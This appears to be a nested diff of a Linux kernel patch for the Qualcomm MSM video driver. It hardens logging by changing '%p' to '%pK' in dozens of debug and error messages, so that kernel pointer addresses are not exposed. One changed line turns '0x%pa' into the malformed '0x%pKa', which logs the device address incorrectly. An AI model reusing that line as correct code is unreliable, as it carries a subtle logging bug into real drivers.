- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -34,7 +34,7 @@ static int get_device_address(struct smem_client *smem_client,
- struct ion_client *clnt = NULL;
-
- if (!iova || !buffer_size || !hndl || !smem_client) {
-- dprintk(VIDC_ERR, "Invalid params: %p, %p, %p, %p\n",
-+ dprintk(VIDC_ERR, "Invalid params: %pK, %pK, %pK, %pK\n",
- smem_client, hndl, iova, buffer_size);
- return -EINVAL;
- }
-@@ -86,7 +86,7 @@ static void put_device_address(struct smem_client *smem_client,
- struct ion_client *clnt = NULL;
-
- if (!hndl || !smem_client) {
-- dprintk(VIDC_WARN, "Invalid params: %p, %p\n",
-+ dprintk(VIDC_WARN, "Invalid params: %pK, %pK\n",
- smem_client, hndl);
- return;
- }
-@@ -120,7 +120,7 @@ static int ion_user_to_kernel(struct smem_client *client, int fd, u32 offset,
-
- hndl = ion_import_dma_buf(client->clnt, fd);
- if (IS_ERR_OR_NULL(hndl)) {
-- dprintk(VIDC_ERR, "Failed to get handle: %p, %d, %d, %p\n",
-+ dprintk(VIDC_ERR, "Failed to get handle: %pK, %d, %d, %pK\n",
- client, fd, offset, hndl);
- rc = -ENOMEM;
- goto fail_import_fd;
-@@ -153,7 +153,7 @@ static int ion_user_to_kernel(struct smem_client *client, int fd, u32 offset,
- goto fail_device_address;
- }
- dprintk(VIDC_DBG,
-- "%s: ion_handle = 0x%p, fd = %d, device_addr = 0x%pa, size = %zx, kvaddr = 0x%p, buffer_type = %d, flags = 0x%lx\n",
-+ "%s: ion_handle = 0x%pK, fd = %d, device_addr = 0x%pa, size = %zx, kvaddr = 0x%pK, buffer_type = %d, flags = 0x%lx\n",
- __func__, mem->smem_priv, fd, &mem->device_addr, mem->size,
- mem->kvaddr, mem->buffer_type, mem->flags);
- return rc;
-@@ -199,7 +199,7 @@ static int alloc_ion_mem(struct smem_client *client, size_t size, u32 align,
- hndl = ion_alloc(client->clnt, size, align, heap_mask, flags);
- if (IS_ERR_OR_NULL(hndl)) {
- dprintk(VIDC_ERR,
-- "Failed to allocate shared memory = %p, %zx, %d, 0x%x\n",
-+ "Failed to allocate shared memory = %pK, %zx, %d, 0x%x\n",
- client, size, align, flags);
- rc = -ENOMEM;
- goto fail_shared_mem_alloc;
-@@ -237,7 +237,7 @@ static int alloc_ion_mem(struct smem_client *client, size_t size, u32 align,
- }
- mem->size = size;
- dprintk(VIDC_DBG,
-- "%s: ion_handle = 0x%p, device_addr = 0x%pa, size = 0x%zx, kvaddr = 0x%p, buffer_type = 0x%x, flags = 0x%lx\n",
-+ "%s: ion_handle = 0x%pK, device_addr = 0x%pa, size = 0x%zx, kvaddr = 0x%pK, buffer_type = 0x%x, flags = 0x%lx\n",
- __func__, mem->smem_priv, &mem->device_addr,
- mem->size, mem->kvaddr,
- mem->buffer_type, mem->flags);
-@@ -255,7 +255,7 @@ static void free_ion_mem(struct smem_client *client, struct msm_smem *mem)
- int domain, partition, rc;
-
- dprintk(VIDC_DBG,
-- "%s: ion_handle = 0x%p, device_addr = 0x%pa, size = 0x%zx, kvaddr = 0x%p, buffer_type = 0x%x\n",
-+ "%s: ion_handle = 0x%pK, device_addr = 0x%pa, size = 0x%zx, kvaddr = 0x%pK, buffer_type = 0x%x\n",
- __func__, mem->smem_priv, &mem->device_addr,
- mem->size, mem->kvaddr, mem->buffer_type);
- rc = msm_smem_get_domain_partition((void *)client, mem->flags,
-@@ -333,7 +333,7 @@ static int ion_cache_operations(struct smem_client *client,
- int rc = 0;
- int msm_cache_ops = 0;
- if (!mem || !client) {
-- dprintk(VIDC_ERR, "Invalid params: %p, %p\n",
-+ dprintk(VIDC_ERR, "Invalid params: %pK, %pK\n",
- mem, client);
- return -EINVAL;
- }
-@@ -380,7 +380,7 @@ int msm_smem_cache_operations(void *clt, struct msm_smem *mem,
- struct smem_client *client = clt;
- int rc = 0;
- if (!client) {
-- dprintk(VIDC_ERR, "Invalid params: %p\n",
-+ dprintk(VIDC_ERR, "Invalid params: %pK\n",
- client);
- return -EINVAL;
- }
-diff --git a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c
-index 309979c..c43c64c 100644
---- a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c
-+++ b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -307,7 +307,7 @@ static int read_platform_resources(struct msm_vidc_core *core,
- struct platform_device *pdev)
- {
- if (!core || !pdev) {
-- dprintk(VIDC_ERR, "%s: Invalid params %p %p\n",
-+ dprintk(VIDC_ERR, "%s: Invalid params %pK %pK\n",
- __func__, core, pdev);
- return -EINVAL;
- }
-@@ -696,7 +696,7 @@ static int msm_vidc_remove(struct platform_device *pdev)
- struct msm_vidc_core *core;
-
- if (!pdev) {
-- dprintk(VIDC_ERR, "%s invalid input %p", __func__, pdev);
-+ dprintk(VIDC_ERR, "%s invalid input %pK", __func__, pdev);
- return -EINVAL;
- }
- core = pdev->dev.platform_data;
-diff --git a/drivers/media/platform/msm/vidc/msm_vdec.c b/drivers/media/platform/msm/vidc/msm_vdec.c
-index c92d655..dd512ad 100644
---- a/drivers/media/platform/msm/vidc/msm_vdec.c
-+++ b/drivers/media/platform/msm/vidc/msm_vdec.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -835,7 +835,7 @@ int msm_vdec_prepare_buf(struct msm_vidc_inst *inst, - if (inst->state == MSM_VIDC_CORE_INVALID || - inst->core->state == VIDC_CORE_INVALID) { - dprintk(VIDC_ERR, -- "Core %p in bad state, ignoring prepare buf\n", -+ "Core %pK in bad state, ignoring prepare buf\n", - inst->core); - goto exit; - } -@@ -914,7 +914,7 @@ int msm_vdec_release_buf(struct msm_vidc_inst *inst, - if (inst->state == MSM_VIDC_CORE_INVALID || - core->state == VIDC_CORE_INVALID) { - dprintk(VIDC_ERR, -- "Core %p in bad state, ignoring release output buf\n", -+ "Core %pK in bad state, ignoring release output buf\n", - core); - goto exit; - } -@@ -1007,7 +1007,7 @@ int msm_vdec_reqbufs(struct msm_vidc_inst *inst, struct v4l2_requestbuffers *b) - int rc = 0; - if (!inst || !b) { - dprintk(VIDC_ERR, -- "Invalid input, inst = %p, buffer = %p\n", inst, b); -+ "Invalid input, inst = %pK, buffer = %pK\n", inst, b); - return -EINVAL; - } - q = msm_comm_get_vb2q(inst, b->type); -@@ -1038,7 +1038,7 @@ int msm_vdec_g_fmt(struct msm_vidc_inst *inst, struct v4l2_format *f) - - if (!inst || !f || !inst->core || !inst->core->device) { - dprintk(VIDC_ERR, -- "Invalid input, inst = %p, format = %p\n", inst, f); -+ "Invalid input, inst = %pK, format = %pK\n", inst, f); - return -EINVAL; - } - -@@ -1215,7 +1215,7 @@ int msm_vdec_s_parm(struct msm_vidc_inst *inst, struct v4l2_streamparm *a) - fps = fps - 1; - - if (inst->prop.fps != fps) { -- dprintk(VIDC_PROF, "reported fps changed for %p: %d->%d\n", -+ dprintk(VIDC_PROF, "reported fps changed for %pK: %d->%d\n", - inst, inst->prop.fps, fps); - inst->prop.fps = fps; - msm_dcvs_init_load(inst); -@@ -1381,7 +1381,7 @@ int msm_vdec_s_fmt(struct msm_vidc_inst *inst, struct v4l2_format *f) - - if (!f || !inst || !inst->core || !inst->core->device) { - dprintk(VIDC_ERR, -- "%s: invalid parameters, format 
%p, inst %p\n", -+ "%s: invalid parameters, format %pK, inst %pK\n", - __func__, f, inst); - return -EINVAL; - } -@@ -1562,7 +1562,7 @@ int msm_vdec_querycap(struct msm_vidc_inst *inst, struct v4l2_capability *cap) - { - if (!inst || !cap) { - dprintk(VIDC_ERR, -- "Invalid input, inst = %p, cap = %p\n", inst, cap); -+ "Invalid input, inst = %pK, cap = %pK\n", inst, cap); - return -EINVAL; - } - strlcpy(cap->driver, MSM_VIDC_DRV_NAME, sizeof(cap->driver)); -@@ -1582,7 +1582,7 @@ int msm_vdec_enum_fmt(struct msm_vidc_inst *inst, struct v4l2_fmtdesc *f) - int rc = 0; - if (!inst || !f) { - dprintk(VIDC_ERR, -- "Invalid input, inst = %p, f = %p\n", inst, f); -+ "Invalid input, inst = %pK, f = %pK\n", inst, f); - return -EINVAL; - } - if (f->type == V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE) { -@@ -1640,7 +1640,7 @@ static int msm_vdec_queue_setup(struct vb2_queue *q, - - if (!q || !num_buffers || !num_planes - || !sizes || !q->drv_priv) { -- dprintk(VIDC_ERR, "Invalid input, q = %p, %p, %p\n", -+ dprintk(VIDC_ERR, "Invalid input, q = %pK, %pK, %pK\n", - q, num_buffers, num_planes); - return -EINVAL; - } -@@ -1829,7 +1829,7 @@ static inline int start_streaming(struct msm_vidc_inst *inst) - rc = msm_comm_try_state(inst, MSM_VIDC_START_DONE); - if (rc) { - dprintk(VIDC_ERR, -- "Failed to move inst: %p to start done state\n", inst); -+ "Failed to move inst: %pK to start done state\n", inst); - goto fail_start; - } - msm_dcvs_init_load(inst); -@@ -1866,7 +1866,7 @@ static inline int stop_streaming(struct msm_vidc_inst *inst) - rc = msm_comm_try_state(inst, MSM_VIDC_RELEASE_RESOURCES_DONE); - if (rc) - dprintk(VIDC_ERR, -- "Failed to move inst: %p to start done state\n", inst); -+ "Failed to move inst: %pK to start done state\n", inst); - return rc; - } - -@@ -1876,7 +1876,7 @@ static int msm_vdec_start_streaming(struct vb2_queue *q, unsigned int count) - int rc = 0; - struct hfi_device *hdev; - if (!q || !q->drv_priv) { -- dprintk(VIDC_ERR, "Invalid input, q = %p\n", q); -+ 
dprintk(VIDC_ERR, "Invalid input, q = %pK\n", q); - return -EINVAL; - } - inst = q->drv_priv; -@@ -1909,7 +1909,7 @@ static int msm_vdec_stop_streaming(struct vb2_queue *q) - struct msm_vidc_inst *inst; - int rc = 0; - if (!q || !q->drv_priv) { -- dprintk(VIDC_ERR, "Invalid input, q = %p\n", q); -+ dprintk(VIDC_ERR, "Invalid input, q = %pK\n", q); - return -EINVAL; - } - inst = q->drv_priv; -@@ -1934,7 +1934,7 @@ static int msm_vdec_stop_streaming(struct vb2_queue *q) - - if (rc) - dprintk(VIDC_ERR, -- "Failed to move inst: %p, cap = %d to state: %d\n", -+ "Failed to move inst: %pK, cap = %d to state: %d\n", - inst, q->type, MSM_VIDC_RELEASE_RESOURCES_DONE); - return rc; - } -@@ -1992,7 +1992,7 @@ int msm_vdec_cmd(struct msm_vidc_inst *inst, struct v4l2_decoder_cmd *dec) - if (inst->state == MSM_VIDC_CORE_INVALID || - core->state == VIDC_CORE_INVALID) { - dprintk(VIDC_ERR, -- "Core %p in bad state, Sending CLOSE event\n", -+ "Core %pK in bad state, Sending CLOSE event\n", - core); - msm_vidc_queue_v4l2_event(inst, - V4L2_EVENT_MSM_VIDC_CLOSE_DONE); -@@ -2034,7 +2034,7 @@ int msm_vdec_inst_init(struct msm_vidc_inst *inst) - { - int rc = 0; - if (!inst) { -- dprintk(VIDC_ERR, "Invalid input = %p\n", inst); -+ dprintk(VIDC_ERR, "Invalid input = %pK\n", inst); - return -EINVAL; - } - inst->fmts[OUTPUT_PORT] = &vdec_formats[1]; -@@ -2575,7 +2575,7 @@ static int try_set_ctrl(struct msm_vidc_inst *inst, struct v4l2_ctrl *ctrl) - case V4L2_CID_MPEG_VIDC_VIDEO_OPERATING_RATE: - property_id = 0; - inst->operating_rate = ctrl->val; -- dprintk(VIDC_DBG, "inst(%p) operating rate changed to %d", -+ dprintk(VIDC_DBG, "inst(%pK) operating rate changed to %d", - inst, inst->operating_rate >> 16); - msm_comm_scale_clocks_and_bus(inst); - break; -@@ -2607,7 +2607,7 @@ static int msm_vdec_op_s_ctrl(struct v4l2_ctrl *ctrl) - rc = msm_comm_try_state(inst, MSM_VIDC_OPEN_DONE); - if (rc) { - dprintk(VIDC_ERR, -- "Failed to move inst: %p to start done state\n", inst); -+ "Failed to move 
inst: %pK to start done state\n", inst); - goto failed_open_done; - } - -@@ -2639,7 +2639,7 @@ static int msm_vdec_op_g_volatile_ctrl(struct v4l2_ctrl *ctrl) - rc = msm_comm_try_state(inst, MSM_VIDC_OPEN_DONE); - if (rc) { - dprintk(VIDC_ERR, -- "Failed to move inst: %p to start done state\n", inst); -+ "Failed to move inst: %pK to start done state\n", inst); - goto failed_open_done; - } - for (c = 0; c < master->ncontrols; ++c) { -diff --git a/drivers/media/platform/msm/vidc/msm_venc.c b/drivers/media/platform/msm/vidc/msm_venc.c -index 932c980..d3f176d 100644 ---- a/drivers/media/platform/msm/vidc/msm_venc.c -+++ b/drivers/media/platform/msm/vidc/msm_venc.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -1520,7 +1520,7 @@ static inline int start_streaming(struct msm_vidc_inst *inst) - rc = msm_comm_try_state(inst, MSM_VIDC_START_DONE); - if (rc) { - dprintk(VIDC_ERR, -- "Failed to move inst: %p to start done state\n", inst); -+ "Failed to move inst: %pK to start done state\n", inst); - goto fail_start; - } - msm_dcvs_init_load(inst); -@@ -1547,7 +1547,7 @@ static int msm_venc_start_streaming(struct vb2_queue *q, unsigned int count) - struct msm_vidc_inst *inst; - int rc = 0; - if (!q || !q->drv_priv) { -- dprintk(VIDC_ERR, "Invalid input, q = %p\n", q); -+ dprintk(VIDC_ERR, "Invalid input, q = %pK\n", q); - return -EINVAL; - } - inst = q->drv_priv; -@@ -1574,7 +1574,7 @@ static int msm_venc_stop_streaming(struct vb2_queue *q) - struct msm_vidc_inst *inst; - int rc = 0; - if (!q || !q->drv_priv) { -- dprintk(VIDC_ERR, "Invalid input, q = %p\n", q); -+ dprintk(VIDC_ERR, "Invalid input, q = %pK\n", q); - return -EINVAL; - } - inst = q->drv_priv; -@@ -1595,7 +1595,7 @@ static int 
msm_venc_stop_streaming(struct vb2_queue *q) - - if (rc) - dprintk(VIDC_ERR, -- "Failed to move inst: %p, cap = %d to state: %d\n", -+ "Failed to move inst: %pK, cap = %d to state: %d\n", - inst, q->type, MSM_VIDC_CLOSE_DONE); - return rc; - } -@@ -2835,7 +2835,7 @@ static int try_set_ctrl(struct msm_vidc_inst *inst, struct v4l2_ctrl *ctrl) - case V4L2_CID_MPEG_VIDC_VIDEO_OPERATING_RATE: - property_id = 0; - inst->operating_rate = ctrl->val; -- dprintk(VIDC_DBG, "inst(%p) operating rate changed to %d", -+ dprintk(VIDC_DBG, "inst(%pK) operating rate changed to %d", - inst, inst->operating_rate >> 16); - msm_comm_scale_clocks_and_bus(inst); - break; -@@ -3054,7 +3054,7 @@ static int msm_venc_op_s_ctrl(struct v4l2_ctrl *ctrl) - - if (rc) { - dprintk(VIDC_ERR, -- "Failed to move inst: %p to start done state\n", inst); -+ "Failed to move inst: %pK to start done state\n", inst); - goto failed_open_done; - } - -@@ -3098,7 +3098,7 @@ int msm_venc_inst_init(struct msm_vidc_inst *inst) - { - int rc = 0; - if (!inst) { -- dprintk(VIDC_ERR, "Invalid input = %p\n", inst); -+ dprintk(VIDC_ERR, "Invalid input = %pK\n", inst); - return -EINVAL; - } - inst->fmts[CAPTURE_PORT] = &venc_formats[1]; -@@ -3181,7 +3181,7 @@ int msm_venc_querycap(struct msm_vidc_inst *inst, struct v4l2_capability *cap) - { - if (!inst || !cap) { - dprintk(VIDC_ERR, -- "Invalid input, inst = %p, cap = %p\n", inst, cap); -+ "Invalid input, inst = %pK, cap = %pK\n", inst, cap); - return -EINVAL; - } - strlcpy(cap->driver, MSM_VIDC_DRV_NAME, sizeof(cap->driver)); -@@ -3201,7 +3201,7 @@ int msm_venc_enum_fmt(struct msm_vidc_inst *inst, struct v4l2_fmtdesc *f) - int rc = 0; - if (!inst || !f) { - dprintk(VIDC_ERR, -- "Invalid input, inst = %p, f = %p\n", inst, f); -+ "Invalid input, inst = %pK, f = %pK\n", inst, f); - return -EINVAL; - } - if (f->type == V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE) { -@@ -3275,7 +3275,7 @@ int msm_venc_s_parm(struct msm_vidc_inst *inst, struct v4l2_streamparm *a) - fps = fps - 1; - - if 
(inst->prop.fps != fps) { -- dprintk(VIDC_PROF, "reported fps changed for %p: %d->%d\n", -+ dprintk(VIDC_PROF, "reported fps changed for %pK: %d->%d\n", - inst, inst->prop.fps, fps); - inst->prop.fps = fps; - frame_rate.frame_rate = inst->prop.fps * (0x1<<16); -@@ -3329,7 +3329,7 @@ int msm_venc_s_fmt(struct msm_vidc_inst *inst, struct v4l2_format *f) - struct hfi_device *hdev; - if (!inst || !f) { - dprintk(VIDC_ERR, -- "Invalid input, inst = %p, format = %p\n", inst, f); -+ "Invalid input, inst = %pK, format = %pK\n", inst, f); - return -EINVAL; - } - -@@ -3512,7 +3512,7 @@ int msm_venc_g_fmt(struct msm_vidc_inst *inst, struct v4l2_format *f) - - if (!inst || !f) { - dprintk(VIDC_ERR, -- "Invalid input, inst = %p, format = %p\n", inst, f); -+ "Invalid input, inst = %pK, format = %pK\n", inst, f); - return -EINVAL; - } - -@@ -3577,7 +3577,7 @@ int msm_venc_reqbufs(struct msm_vidc_inst *inst, struct v4l2_requestbuffers *b) - int rc = 0; - if (!inst || !b) { - dprintk(VIDC_ERR, -- "Invalid input, inst = %p, buffer = %p\n", inst, b); -+ "Invalid input, inst = %pK, buffer = %pK\n", inst, b); - return -EINVAL; - } - q = msm_comm_get_vb2q(inst, b->type); -@@ -3614,7 +3614,7 @@ int msm_venc_prepare_buf(struct msm_vidc_inst *inst, - if (inst->state == MSM_VIDC_CORE_INVALID || - inst->core->state == VIDC_CORE_INVALID) { - dprintk(VIDC_ERR, -- "Core %p in bad state, ignoring prepare buf\n", -+ "Core %pK in bad state, ignoring prepare buf\n", - inst->core); - goto exit; - } -@@ -3685,7 +3685,7 @@ int msm_venc_release_buf(struct msm_vidc_inst *inst, - rc = msm_comm_try_state(inst, MSM_VIDC_RELEASE_RESOURCES_DONE); - if (rc) { - dprintk(VIDC_ERR, -- "Failed to move inst: %p to release res done state\n", -+ "Failed to move inst: %pK to release res done state\n", - inst); - goto exit; - } -diff --git a/drivers/media/platform/msm/vidc/msm_vidc.c b/drivers/media/platform/msm/vidc/msm_vidc.c -index 38ccaa3..8f4b6b6 100644 ---- a/drivers/media/platform/msm/vidc/msm_vidc.c -+++ 
b/drivers/media/platform/msm/vidc/msm_vidc.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -331,7 +331,7 @@ struct buffer_info *device_to_uvaddr(struct msm_vidc_list *buf_list, - - if (!buf_list || !device_addr) { - dprintk(VIDC_ERR, -- "Invalid input- device_addr: 0x%pa buf_list: %p\n", -+ "Invalid input- device_addr: 0x%pa buf_list: %pK\n", - &device_addr, buf_list); - goto err_invalid_input; - } -@@ -487,7 +487,7 @@ int map_and_register_buf(struct msm_vidc_inst *inst, struct v4l2_buffer *b) - goto exit; - } - -- dprintk(VIDC_DBG, "[MAP] Create binfo = %p fd = %d type = %d\n", -+ dprintk(VIDC_DBG, "[MAP] Create binfo = %pK fd = %d type = %d\n", - binfo, b->m.planes[0].reserved[0], b->type); - - for (i = 0; i < b->length; ++i) { -@@ -570,7 +570,7 @@ int map_and_register_buf(struct msm_vidc_inst *inst, struct v4l2_buffer *b) - goto exit; - } - dprintk(VIDC_DBG, -- "%s: [MAP] binfo = %p, handle[%d] = %p, device_addr = 0x%pa, fd = %d, offset = %d, mapped = %d\n", -+ "%s: [MAP] binfo = %pK, handle[%d] = %pK, device_addr = 0x%pa, fd = %d, offset = %d, mapped = %d\n", - __func__, binfo, i, binfo->handle[i], - &binfo->device_addr[i], binfo->fd[i], - binfo->buff_off[i], binfo->mapped[i]); -@@ -593,7 +593,7 @@ int unmap_and_deregister_buf(struct msm_vidc_inst *inst, - bool found = false, keep_node = false; - - if (!inst || !binfo) { -- dprintk(VIDC_ERR, "%s invalid param: %p %p\n", -+ dprintk(VIDC_ERR, "%s invalid param: %pK %pK\n", - __func__, inst, binfo); - return -EINVAL; - } -@@ -623,7 +623,7 @@ int unmap_and_deregister_buf(struct msm_vidc_inst *inst, - - for (i = 0; i < temp->num_planes; i++) { - dprintk(VIDC_DBG, -- "%s: [UNMAP] binfo = %p, handle[%d] = %p, device_addr = 0x%pa, fd = %d, offset = %d, 
mapped = %d\n", -+ "%s: [UNMAP] binfo = %pK, handle[%d] = %pK, device_addr = 0x%pKa, fd = %d, offset = %d, mapped = %d\n", - __func__, temp, i, temp->handle[i], - &temp->device_addr[i], temp->fd[i], - temp->buff_off[i], temp->mapped[i]); -@@ -652,12 +652,12 @@ int unmap_and_deregister_buf(struct msm_vidc_inst *inst, - } - } - if (!keep_node) { -- dprintk(VIDC_DBG, "[UNMAP] AND-FREED binfo: %p\n", temp); -+ dprintk(VIDC_DBG, "[UNMAP] AND-FREED binfo: %pK\n", temp); - list_del(&temp->list); - kfree(temp); - } else { - temp->inactive = true; -- dprintk(VIDC_DBG, "[UNMAP] NOT-FREED binfo: %p\n", temp); -+ dprintk(VIDC_DBG, "[UNMAP] NOT-FREED binfo: %pK\n", temp); - } - exit: - return 0; -@@ -671,7 +671,7 @@ int qbuf_dynamic_buf(struct msm_vidc_inst *inst, - struct v4l2_plane plane[VIDEO_MAX_PLANES] = { {0} }; - - if (!binfo) { -- dprintk(VIDC_ERR, "%s invalid param: %p\n", __func__, binfo); -+ dprintk(VIDC_ERR, "%s invalid param: %pK\n", __func__, binfo); - return -EINVAL; - } - dprintk(VIDC_DBG, "%s fd[0] = %d\n", __func__, binfo->fd[0]); -@@ -694,7 +694,7 @@ int output_buffer_cache_invalidate(struct msm_vidc_inst *inst, - int rc = 0; - - if (!inst) { -- dprintk(VIDC_ERR, "%s: invalid inst: %p\n", __func__, inst); -+ dprintk(VIDC_ERR, "%s: invalid inst: %pK\n", __func__, inst); - return -EINVAL; - } - -@@ -702,7 +702,7 @@ int output_buffer_cache_invalidate(struct msm_vidc_inst *inst, - return 0; - - if (!binfo) { -- dprintk(VIDC_ERR, "%s: invalid buffer info: %p\n", -+ dprintk(VIDC_ERR, "%s: invalid buffer info: %pK\n", - __func__, inst); - return -EINVAL; - } -@@ -780,7 +780,7 @@ int msm_vidc_release_buffers(void *instance, int buffer_type) - rc = msm_comm_try_state(inst, MSM_VIDC_RELEASE_RESOURCES_DONE); - if (rc) { - dprintk(VIDC_ERR, -- "Failed to move inst: %p to release res done\n", -+ "Failed to move inst: %pK to release res done\n", - inst); - } - } -@@ -862,7 +862,7 @@ int msm_vidc_free_buffers(void *instance, int buffer_type) - for (i = 0; i < 
bi->num_planes; i++) {
- if (bi->handle[i] && bi->mapped[i]) {
- dprintk(VIDC_DBG,
-- "%s: binfo = 0x%p, handle[%d] = %p, device_addr = %pa, fd = %d, offset = %d, buffer_type 0x%x, mapped = %d\n",
-+ "%s: binfo = 0x%pK, handle[%d] = %pK, device_addr = %pa, fd = %d, offset = %d, buffer_type 0x%x, mapped = %d\n",
- __func__, bi, i, bi->handle[i],
- &bi->device_addr[i], bi->fd[i],
- bi->buff_off[i], bi->type,
-@@ -1089,7 +1089,7 @@ int msm_vidc_enum_framesizes(void *instance, struct v4l2_frmsizeenum *fsize)
- struct msm_vidc_capability *capability = NULL;
-
- if (!inst || !fsize) {
-- dprintk(VIDC_ERR, "%s: invalid parameter: %p %p\n",
-+ dprintk(VIDC_ERR, "%s: invalid parameter: %pK %pK\n",
- __func__, inst, fsize);
- return -EINVAL;
- }
-@@ -1156,7 +1156,7 @@ void *msm_vidc_smem_get_client(void *instance)
- struct msm_vidc_inst *inst = instance;
-
- if (!inst || !inst->mem_client) {
-- dprintk(VIDC_ERR, "%s: invalid instance or client = %p\n",
-+ dprintk(VIDC_ERR, "%s: invalid instance or client = %pK\n",
- __func__, inst);
- return NULL;
- }
-@@ -1214,7 +1214,7 @@ static int setup_event_queue(void *inst,
- struct msm_vidc_inst *vidc_inst = (struct msm_vidc_inst *)inst;
-
- if (!inst || !pvdev) {
-- dprintk(VIDC_ERR, "%s Invalid params inst %p pvdev %p\n",
-+ dprintk(VIDC_ERR, "%s Invalid params inst %pK pvdev %pK\n",
- __func__, inst, pvdev);
- return -EINVAL;
- }
-@@ -1290,7 +1290,7 @@ void *msm_vidc_open(int core_id, int session_type)
- goto err_invalid_core;
- }
-
-- pr_info(VIDC_DBG_TAG "Opening video instance: %p, %d\n",
-+ pr_info(VIDC_DBG_TAG "Opening video instance: %pK, %d\n",
- VIDC_MSG_PRIO2STRING(VIDC_INFO), inst, session_type);
- mutex_init(&inst->sync_lock);
- mutex_init(&inst->bufq[CAPTURE_PORT].lock);
-@@ -1493,7 +1493,7 @@ int msm_vidc_close(void *instance)
-
- msm_smem_delete_client(inst->mem_client);
-
-- pr_info(VIDC_DBG_TAG "Closed video instance: %p\n",
-+ pr_info(VIDC_DBG_TAG "Closed video instance: %pK\n",
- VIDC_MSG_PRIO2STRING(VIDC_INFO), 
inst);
- kfree(inst);
-
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc_common.c b/drivers/media/platform/msm/vidc/msm_vidc_common.c
-index f001290..48192b3 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc_common.c
-+++ b/drivers/media/platform/msm/vidc/msm_vidc_common.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -159,7 +159,7 @@ int msm_comm_get_inst_load(struct msm_vidc_inst *inst,
- if (!is_thumbnail_session(inst) && !is_realtime_session(inst) &&
- (quirks & LOAD_CALC_IGNORE_NON_REALTIME_LOAD)) {
- if (!inst->prop.fps) {
-- dprintk(VIDC_INFO, "%s: instance:%p prop->fps is set 0\n", __func__, inst);
-+ dprintk(VIDC_INFO, "%s: instance:%pK prop->fps is set 0\n", __func__, inst);
- load = 0;
- } else {
- load = msm_comm_get_mbs_per_sec(inst) / inst->prop.fps;
-@@ -167,7 +167,7 @@ int msm_comm_get_inst_load(struct msm_vidc_inst *inst,
- }
-
- dprintk(VIDC_DBG,
-- "inst[%p]: load %d, wxh %dx%d, fps %d, operating_rate %d, flags 0x%x, quirks 0x%x\n",
-+ "inst[%pK]: load %d, wxh %dx%d, fps %d, operating_rate %d, flags 0x%x, quirks 0x%x\n",
- inst, load, inst->prop.width[OUTPUT_PORT],
- inst->prop.height[OUTPUT_PORT], inst->prop.fps,
- inst->operating_rate >> 16, inst->flags, quirks);
-@@ -182,7 +182,7 @@ int msm_comm_get_load(struct msm_vidc_core *core,
- int num_mbs_per_sec = 0;
-
- if (!core) {
-- dprintk(VIDC_ERR, "Invalid args: %p\n", core);
-+ dprintk(VIDC_ERR, "Invalid args: %pK\n", core);
- return -EINVAL;
- }
-
-@@ -280,13 +280,13 @@ static int msm_comm_vote_bus(struct msm_vidc_core *core)
- struct vidc_bus_vote_data *vote_data = NULL;
-
- if (!core) {
-- dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, core);
-+ dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, core);
- 
return -EINVAL;
- }
-
- hdev = core->device;
- if (!hdev) {
-- dprintk(VIDC_ERR, "%s Invalid device handle: %p\n",
-+ dprintk(VIDC_ERR, "%s Invalid device handle: %pK\n",
- __func__, hdev);
- return -EINVAL;
- }
-@@ -387,7 +387,7 @@ const struct msm_vidc_format *msm_comm_get_pixel_fmt_index(
- {
- int i, k = 0;
- if (!fmt || index < 0) {
-- dprintk(VIDC_ERR, "Invalid inputs, fmt = %p, index = %d\n",
-+ dprintk(VIDC_ERR, "Invalid inputs, fmt = %pK, index = %d\n",
- fmt, index);
- return NULL;
- }
-@@ -409,7 +409,7 @@ struct msm_vidc_format *msm_comm_get_pixel_fmt_fourcc(
- {
- int i;
- if (!fmt) {
-- dprintk(VIDC_ERR, "Invalid inputs, fmt = %p\n", fmt);
-+ dprintk(VIDC_ERR, "Invalid inputs, fmt = %pK\n", fmt);
- return NULL;
- }
- for (i = 0; i < size; i++) {
-@@ -572,11 +572,11 @@ static void change_inst_state(struct msm_vidc_inst *inst,
- mutex_lock(&inst->lock);
- if (inst->state == MSM_VIDC_CORE_INVALID) {
- dprintk(VIDC_DBG,
-- "Inst: %p is in bad state can't change state to %d\n",
-+ "Inst: %pK is in bad state can't change state to %d\n",
- inst, state);
- goto exit;
- }
-- dprintk(VIDC_DBG, "Moved inst: %p from state: %d to state: %d\n",
-+ dprintk(VIDC_DBG, "Moved inst: %pK from state: %d to state: %d\n",
- inst, inst->state, state);
- inst->state = state;
- exit:
-@@ -587,7 +587,7 @@ static int signal_session_msg_receipt(enum command_response cmd,
- struct msm_vidc_inst *inst)
- {
- if (!inst) {
-- dprintk(VIDC_ERR, "Invalid(%p) instance id\n", inst);
-+ dprintk(VIDC_ERR, "Invalid(%pK) instance id\n", inst);
- return -EINVAL;
